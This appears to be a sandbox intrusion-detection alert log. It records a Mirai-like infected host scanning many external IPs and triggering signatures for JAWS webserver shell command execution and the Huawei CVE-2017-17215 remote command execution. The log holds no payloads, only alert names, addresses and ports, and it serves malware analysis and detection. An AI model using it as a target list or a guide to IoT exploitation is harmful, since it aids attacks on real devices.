                                                          2025-02-04T18:11:43.877396+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154379423.15.127.18380TCP
                                                          2025-02-04T18:11:43.878866+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1553316187.217.155.17580TCP
                                                          2025-02-04T18:11:43.878866+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1553316187.217.155.17580TCP
                                                          2025-02-04T18:11:43.884516+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1542838161.104.195.7880TCP
                                                          2025-02-04T18:11:43.884516+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1542838161.104.195.7880TCP
                                                          2025-02-04T18:11:43.894216+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155641890.198.87.16880TCP
                                                          2025-02-04T18:11:43.894216+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155641890.198.87.16880TCP
                                                          2025-02-04T18:11:43.895815+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154170483.238.144.6180TCP
                                                          2025-02-04T18:11:43.895815+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154170483.238.144.6180TCP
                                                          2025-02-04T18:11:43.907637+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154831886.35.202.6980TCP
                                                          2025-02-04T18:11:43.907637+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154831886.35.202.6980TCP
                                                          2025-02-04T18:11:43.913606+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153784663.54.131.2080TCP
                                                          2025-02-04T18:11:43.913606+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153784663.54.131.2080TCP
                                                          2025-02-04T18:11:43.913830+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153838257.0.217.8480TCP
                                                          2025-02-04T18:11:43.913830+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153838257.0.217.8480TCP
                                                          2025-02-04T18:11:43.913899+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1550544113.9.76.5580TCP
                                                          2025-02-04T18:11:43.913899+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1550544113.9.76.5580TCP
                                                          2025-02-04T18:11:43.914016+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.15333869.120.59.10080TCP
                                                          2025-02-04T18:11:43.914016+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.15333869.120.59.10080TCP
                                                          2025-02-04T18:11:43.915770+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.156069625.119.53.580TCP
                                                          2025-02-04T18:11:43.915770+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.156069625.119.53.580TCP
                                                          2025-02-04T18:11:43.942810+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154771841.39.69.13980TCP
                                                          2025-02-04T18:11:43.942810+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154771841.39.69.13980TCP
                                                          2025-02-04T18:11:43.974132+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1535178179.192.200.23180TCP
                                                          2025-02-04T18:11:43.974132+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1535178179.192.200.23180TCP
                                                          2025-02-04T18:11:44.007263+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1537570158.116.133.14480TCP
                                                          2025-02-04T18:11:44.007263+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1537570158.116.133.14480TCP
                                                          2025-02-04T18:11:44.065977+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1541832156.158.79.19137215TCP
                                                          2025-02-04T18:11:44.065988+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153821674.93.106.20380TCP
                                                          2025-02-04T18:11:44.065988+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153821674.93.106.20380TCP
                                                          2025-02-04T18:11:44.079633+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153431241.253.49.6637215TCP
                                                          2025-02-04T18:11:44.080151+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1534360156.146.215.9837215TCP
                                                          2025-02-04T18:11:44.084063+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1549078197.88.243.21837215TCP
                                                          2025-02-04T18:11:44.085603+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1557624190.1.187.2380TCP
                                                          2025-02-04T18:11:44.085603+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1557624190.1.187.2380TCP
                                                          2025-02-04T18:11:44.085931+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155874670.27.202.24980TCP
                                                          2025-02-04T18:11:44.085931+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155874670.27.202.24980TCP
                                                          2025-02-04T18:11:44.098916+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153912641.190.19.20037215TCP
                                                          2025-02-04T18:11:44.099347+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1552356113.60.71.880TCP
                                                          2025-02-04T18:11:44.099347+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1552356113.60.71.880TCP
                                                          2025-02-04T18:11:44.578119+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1551222156.228.164.11037215TCP
                                                          2025-02-04T18:11:44.973776+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1554430156.158.216.17337215TCP
                                                          2025-02-04T18:11:44.977178+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153529841.127.128.037215TCP
                                                          2025-02-04T18:11:44.983197+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154707841.114.117.19037215TCP
                                                          2025-02-04T18:11:44.985948+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1541990197.79.247.5037215TCP
                                                          2025-02-04T18:11:44.985948+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1550026156.206.254.22537215TCP
                                                          2025-02-04T18:11:44.987829+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1538708197.198.35.1637215TCP
                                                          2025-02-04T18:11:44.988326+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1553756197.57.30.18637215TCP
                                                          2025-02-04T18:11:44.988899+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1540228197.152.15.12437215TCP
                                                          2025-02-04T18:11:44.991830+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1547110197.44.208.17437215TCP
                                                          2025-02-04T18:11:44.991851+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1541612156.193.79.19637215TCP
                                                          2025-02-04T18:11:44.992124+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1540230156.80.185.15637215TCP
                                                          2025-02-04T18:11:45.145876+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155939037.111.84.5480TCP
                                                          2025-02-04T18:11:45.145876+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155939037.111.84.5480TCP
                                                          2025-02-04T18:11:45.146810+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1555192197.104.233.25337215TCP
                                                          2025-02-04T18:11:45.148672+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155198654.130.141.17080TCP
                                                          2025-02-04T18:11:45.148672+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155198654.130.141.17080TCP
                                                          2025-02-04T18:11:45.160769+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1558656156.64.0.12837215TCP
                                                          2025-02-04T18:11:45.956409+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1541508156.99.113.2437215TCP
                                                          2025-02-04T18:11:45.970245+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1557236156.60.115.24437215TCP
                                                          2025-02-04T18:11:45.970378+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1553304156.28.114.5937215TCP
                                                          2025-02-04T18:11:45.971090+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1536858156.80.73.9037215TCP
                                                          2025-02-04T18:11:45.972348+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539020156.127.18.24837215TCP
                                                          2025-02-04T18:11:45.972707+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1555670156.166.178.337215TCP
                                                          2025-02-04T18:11:45.973048+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1553108197.58.88.19737215TCP
                                                          2025-02-04T18:11:45.973086+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1552954156.79.255.14237215TCP
                                                          2025-02-04T18:11:45.974045+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1536886197.119.87.18537215TCP
                                                          2025-02-04T18:11:45.974222+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1541032156.147.94.23537215TCP
                                                          2025-02-04T18:11:45.974528+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154061841.204.54.25437215TCP
                                                          2025-02-04T18:11:45.976179+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1534764197.34.184.21537215TCP
                                                          2025-02-04T18:11:45.985850+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539920197.116.128.11737215TCP
                                                          2025-02-04T18:11:45.985914+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153588041.136.19.22137215TCP
                                                          2025-02-04T18:11:45.989346+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1559756197.243.83.15237215TCP
                                                          2025-02-04T18:11:45.989619+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1537002156.237.202.6737215TCP
                                                          2025-02-04T18:11:45.989843+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1557748197.234.52.3237215TCP
                                                          2025-02-04T18:11:45.990492+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1550130156.14.214.23037215TCP
                                                          2025-02-04T18:11:45.990778+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1544816156.53.45.24437215TCP
                                                          2025-02-04T18:11:45.991048+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154738241.210.51.16537215TCP
                                                          2025-02-04T18:11:45.991190+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1551666197.158.248.18937215TCP
                                                          2025-02-04T18:11:45.992500+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1558970197.58.112.23337215TCP
                                                          2025-02-04T18:11:46.035349+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539468197.80.140.13737215TCP
                                                          2025-02-04T18:11:46.142273+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1555838202.190.152.11580TCP
                                                          2025-02-04T18:11:46.142273+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1555838202.190.152.11580TCP
                                                          2025-02-04T18:11:46.159988+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1537292194.10.184.12480TCP
                                                          2025-02-04T18:11:46.159988+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1537292194.10.184.12480TCP
                                                          2025-02-04T18:11:46.568199+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539100156.225.90.13437215TCP
                                                          2025-02-04T18:11:46.592325+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153396418.238.109.20580TCP
                                                          2025-02-04T18:11:46.592325+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153396418.238.109.20580TCP
                                                          2025-02-04T18:11:46.933235+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1543392156.236.14.8837215TCP
                                                          2025-02-04T18:11:47.001500+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1553070197.137.12.6437215TCP
                                                          2025-02-04T18:11:47.001610+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154535841.234.149.16437215TCP
                                                          2025-02-04T18:11:47.002249+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1559104197.214.151.18837215TCP
                                                          2025-02-04T18:11:47.017846+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1547016161.225.186.18980TCP
                                                          2025-02-04T18:11:47.017846+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1547016161.225.186.18980TCP
                                                          2025-02-04T18:11:47.018937+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1548378197.153.147.037215TCP
                                                          2025-02-04T18:11:47.019026+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1541392156.121.211.22837215TCP
                                                          2025-02-04T18:11:47.020842+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1545310156.41.200.15437215TCP
                                                          2025-02-04T18:11:47.032778+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155234441.13.201.637215TCP
                                                          2025-02-04T18:11:47.035299+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535024156.165.110.10137215TCP
                                                          2025-02-04T18:11:47.038413+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154604441.59.4.9537215TCP
                                                          2025-02-04T18:11:47.040310+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1559366156.80.97.5937215TCP
                                                          2025-02-04T18:11:47.052155+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1556160156.73.163.2237215TCP
                                                          2025-02-04T18:11:47.054258+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153570441.24.75.8937215TCP
                                                          2025-02-04T18:11:47.056033+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1550394156.242.156.3337215TCP
                                                          2025-02-04T18:11:47.142085+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154645224.76.98.280TCP
                                                          2025-02-04T18:11:47.142085+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154645224.76.98.280TCP
                                                          2025-02-04T18:11:47.143736+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1556378193.158.34.3480TCP
                                                          2025-02-04T18:11:47.143736+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1556378193.158.34.3480TCP
                                                          2025-02-04T18:11:47.143833+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1551154197.182.81.1737215TCP
                                                          2025-02-04T18:11:47.143872+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539036156.130.121.17737215TCP
                                                          2025-02-04T18:11:47.147602+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1542332197.171.131.23080TCP
                                                          2025-02-04T18:11:47.147602+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1542332197.171.131.23080TCP
                                                          2025-02-04T18:11:47.148189+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.15606981.19.246.23580TCP
                                                          2025-02-04T18:11:47.148189+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.15606981.19.246.23580TCP
                                                          2025-02-04T18:11:47.165413+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1552604156.47.87.15737215TCP
                                                          2025-02-04T18:11:47.173412+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155693883.248.130.2380TCP
                                                          2025-02-04T18:11:47.173412+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155693883.248.130.2380TCP
                                                          2025-02-04T18:11:48.001603+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1536418156.110.236.15437215TCP
                                                          2025-02-04T18:11:48.002063+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1533700197.71.189.13837215TCP
                                                          2025-02-04T18:11:48.017108+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1545858197.214.176.8337215TCP
                                                          2025-02-04T18:11:48.018067+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1548330197.84.79.4037215TCP
                                                          2025-02-04T18:11:48.018992+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153344041.221.191.22937215TCP
                                                          2025-02-04T18:11:48.032495+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1551154156.54.76.23737215TCP
                                                          2025-02-04T18:11:48.048412+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1559166197.115.74.22637215TCP
                                                          2025-02-04T18:11:48.048470+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1537228156.197.91.6537215TCP
                                                          2025-02-04T18:11:48.049026+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153315641.214.32.2337215TCP
                                                          2025-02-04T18:11:48.050010+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154508841.250.150.15437215TCP
                                                          2025-02-04T18:11:48.050300+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1540350197.86.44.3937215TCP
                                                          2025-02-04T18:11:48.050405+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1551232156.119.1.15737215TCP
                                                          2025-02-04T18:11:48.052275+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1554636197.127.188.9237215TCP
                                                          2025-02-04T18:11:48.052507+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1550412156.203.209.25437215TCP
                                                          2025-02-04T18:11:48.052595+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1552172156.174.59.5637215TCP
                                                          2025-02-04T18:11:48.053740+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1543390197.21.220.13337215TCP
                                                          2025-02-04T18:11:48.054043+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1553368156.111.51.21537215TCP
                                                          2025-02-04T18:11:48.054468+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1551742156.212.221.19437215TCP
                                                          2025-02-04T18:11:48.064010+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1548422156.167.118.16937215TCP
                                                          2025-02-04T18:11:48.064325+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535876156.194.153.16337215TCP
                                                          2025-02-04T18:11:48.064327+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1540212197.183.113.21337215TCP
                                                          2025-02-04T18:11:48.064629+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154322241.93.153.15037215TCP
                                                          2025-02-04T18:11:48.064996+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155553041.137.108.1937215TCP
                                                          2025-02-04T18:11:48.065544+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153614441.243.175.23437215TCP
                                                          2025-02-04T18:11:48.066611+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1552740197.140.242.21637215TCP
                                                          2025-02-04T18:11:48.066659+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1546914197.173.174.13637215TCP
                                                          2025-02-04T18:11:48.066771+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1550974156.157.29.7437215TCP
                                                          2025-02-04T18:11:48.067427+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1542666197.138.158.23037215TCP
                                                          2025-02-04T18:11:48.067869+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.156029041.65.253.8237215TCP
                                                          2025-02-04T18:11:48.068126+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1542574197.195.178.16037215TCP
                                                          2025-02-04T18:11:48.068575+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1555462156.137.181.3537215TCP
                                                          2025-02-04T18:11:48.068575+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535724156.35.204.4137215TCP
                                                          2025-02-04T18:11:48.068575+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155511641.200.62.2737215TCP
                                                          2025-02-04T18:11:48.068597+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1540134197.117.139.8637215TCP
                                                          2025-02-04T18:11:48.068637+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1552260197.96.246.10537215TCP
                                                          2025-02-04T18:11:48.068720+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539304197.230.75.18537215TCP
                                                          2025-02-04T18:11:48.069039+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154781841.28.7.18737215TCP
                                                          2025-02-04T18:11:48.069100+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539196197.217.210.14037215TCP
                                                          2025-02-04T18:11:48.069126+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1542726156.193.218.24637215TCP
                                                          2025-02-04T18:11:48.069172+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1550034197.166.194.25237215TCP
                                                          2025-02-04T18:11:48.069785+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1541826156.223.115.21737215TCP
                                                          2025-02-04T18:11:48.070767+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1557036197.114.86.9937215TCP
                                                          2025-02-04T18:11:48.072226+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155711641.143.10.7537215TCP
                                                          2025-02-04T18:11:48.072241+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1540830156.87.5.737215TCP
                                                          2025-02-04T18:11:48.072624+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155245641.85.95.10737215TCP
                                                          2025-02-04T18:11:49.048655+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1553260156.251.53.10937215TCP
                                                          2025-02-04T18:11:49.048666+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1549744156.245.26.16837215TCP
                                                          2025-02-04T18:11:49.048821+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155915841.52.186.23337215TCP
                                                          2025-02-04T18:11:49.049182+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153572241.234.119.21737215TCP
                                                          2025-02-04T18:11:49.050079+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155073641.120.185.17837215TCP
                                                          2025-02-04T18:11:49.050203+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1545374156.81.131.25037215TCP
                                                          2025-02-04T18:11:49.050482+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153317841.197.57.12137215TCP
                                                          2025-02-04T18:11:49.050725+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1534482197.63.184.8337215TCP
                                                          2025-02-04T18:11:49.052178+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1546348156.174.17.21937215TCP
                                                          2025-02-04T18:11:49.052434+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1538782197.252.192.1937215TCP
                                                          2025-02-04T18:11:49.052551+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1537846156.182.107.11237215TCP
                                                          2025-02-04T18:11:49.053876+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535618156.73.111.2737215TCP
                                                          2025-02-04T18:11:49.054175+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155065841.42.215.5637215TCP
                                                          2025-02-04T18:11:49.064092+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1549576197.21.28.24537215TCP
                                                          2025-02-04T18:11:49.065720+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1546520197.222.42.11637215TCP
                                                          2025-02-04T18:11:49.065762+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153773441.206.96.11437215TCP
                                                          2025-02-04T18:11:49.066132+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1560858197.64.98.15037215TCP
                                                          2025-02-04T18:11:49.066248+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155359441.39.206.037215TCP
                                                          2025-02-04T18:11:49.066374+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539584197.105.30.16337215TCP
                                                          2025-02-04T18:11:49.066578+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155086441.99.147.7537215TCP
